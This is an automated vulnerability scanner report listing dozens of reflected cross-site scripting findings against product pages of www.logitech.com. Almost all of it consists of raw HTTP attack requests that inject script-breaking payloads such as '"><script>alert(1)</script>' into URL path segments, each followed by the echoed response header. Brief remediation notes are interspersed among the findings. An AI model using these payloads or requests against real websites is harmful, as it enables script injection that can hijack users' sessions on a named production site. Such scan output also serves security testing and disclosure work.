HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593de"><script>alert(1)</script>8280413eb00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us593de"><script>alert(1)</script>8280413eb00/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b16b1"%3bbc7ade2e9dc was submitted in the REST URL parameter 1. This input was echoed as b16b1";bc7ade2e9dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usb16b1"%3bbc7ade2e9dc/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fea1d</script><script>alert(1)</script>664221accc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audiofea1d</script><script>alert(1)</script>664221accc0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d04c"><script>alert(1)</script>a1f7c9e6580 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio1d04c"><script>alert(1)</script>a1f7c9e6580 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10266"%3bcf70604d60d was submitted in the REST URL parameter 1. This input was echoed as 10266";cf70604d60d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us10266"%3bcf70604d60d/speakers-audio/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ce4f</script><script>alert(1)</script>13a583591d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7ce4f</script><script>alert(1)</script>13a583591d1/speakers-audio/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36889"><script>alert(1)</script>e0c56d92104 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us36889"><script>alert(1)</script>e0c56d92104/speakers-audio/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de297"><script>alert(1)</script>ba01cbfce41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/speakers-audiode297"><script>alert(1)</script>ba01cbfce41/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6c2</script><script>alert(1)</script>c5484b96eee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio9e6c2</script><script>alert(1)</script>c5484b96eee/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1e3c</script><script>alert(1)</script>cc3a9560a2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b1e3c</script><script>alert(1)</script>cc3a9560a2f/speakers-audio/earphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18d2"><script>alert(1)</script>3679368dfe2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usd18d2"><script>alert(1)</script>3679368dfe2/speakers-audio/earphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dac46</script><script>alert(1)</script>b97e7b11e9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audiodac46</script><script>alert(1)</script>b97e7b11e9f/earphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e1e"><script>alert(1)</script>26da6c6ff8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio50e1e"><script>alert(1)</script>26da6c6ff8/earphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8033"><script>alert(1)</script>777d15633fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/earphonesc8033"><script>alert(1)</script>777d15633fa HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c348f</script><script>alert(1)</script>75d96705425 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/earphonesc348f</script><script>alert(1)</script>75d96705425 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a2b"><script>alert(1)</script>cda0e0800a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf7a2b"><script>alert(1)</script>cda0e0800a7/speakers-audio/home-pc-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fb2d</script><script>alert(1)</script>90f74dd3e79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9fb2d</script><script>alert(1)</script>90f74dd3e79/speakers-audio/home-pc-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720e9"><script>alert(1)</script>e75da42dfe5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio720e9"><script>alert(1)</script>e75da42dfe5/home-pc-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac791</script><script>alert(1)</script>858d66969a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audioac791</script><script>alert(1)</script>858d66969a9/home-pc-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7539c"><script>alert(1)</script>c01ae4cd94c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/home-pc-speakers7539c"><script>alert(1)</script>c01ae4cd94c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcc5e</script><script>alert(1)</script>79f389c80a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/home-pc-speakersfcc5e</script><script>alert(1)</script>79f389c80a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed071"><script>alert(1)</script>3060e727e0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-used071"><script>alert(1)</script>3060e727e0a/speakers-audio/ipod-mp3-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42af8</script><script>alert(1)</script>048767d87cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /42af8</script><script>alert(1)</script>048767d87cb/speakers-audio/ipod-mp3-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64fb0</script><script>alert(1)</script>29be40c85cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio64fb0</script><script>alert(1)</script>29be40c85cb/ipod-mp3-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66eb8"><script>alert(1)</script>b3101b339c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio66eb8"><script>alert(1)</script>b3101b339c6/ipod-mp3-speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fffc8"><script>alert(1)</script>cb7baa7630d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/speakers-audio/ipod-mp3-speakersfffc8"><script>alert(1)</script>cb7baa7630d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71573</script><script>alert(1)</script>a3931d6043 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/speakers-audio/ipod-mp3-speakers71573</script><script>alert(1)</script>a3931d6043 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21f26</script><script>alert(1)</script>beb1794ac9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
